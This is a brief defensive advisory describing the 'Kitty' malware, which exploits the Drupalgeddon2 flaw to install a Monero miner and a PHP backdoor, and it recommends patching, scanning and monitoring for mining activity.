Kitty Malware Infecting Vulnerable Drupal Sites

A new malware targeting vulnerable Drupal sites is installing a cryptocurrency-miner and a PHP backdoor onto compromised servers. Dubbed “Kitty” by security researchers from Imperva, the malware exploits the Drupalgeddon2 vulnerability in Drupal sites that allows a remote attacker to execute malicious code. Once an attacker gains access to the server, the popular XMRig Monero miner is installed and begins using the compromised server’s resources to mine the cryptocurrency. Along with the cryptocurrency-miner, a backdoor is installed, and the threat actor creates a time-based job scheduler that re-downloads the malicious script every minute. This process allows the malware to re-infect a server even if updates are attempted. The NJCCIC recommends all Drupal site owners and administrators review the Imperva security blog for more information, ensure all Drupal sites are up-to-date with the most recent patches, run a full system scan, and follow the recovery instructions, if necessary. Additionally, monitor network activity for anomalies indicative of cryptocurrency-mining activity. End users are encouraged to use web browsers that proactively block cryptocurrency-mining scripts or install a reputable ad-blocking, script-blocking, and coin-blocking extension in their current browser.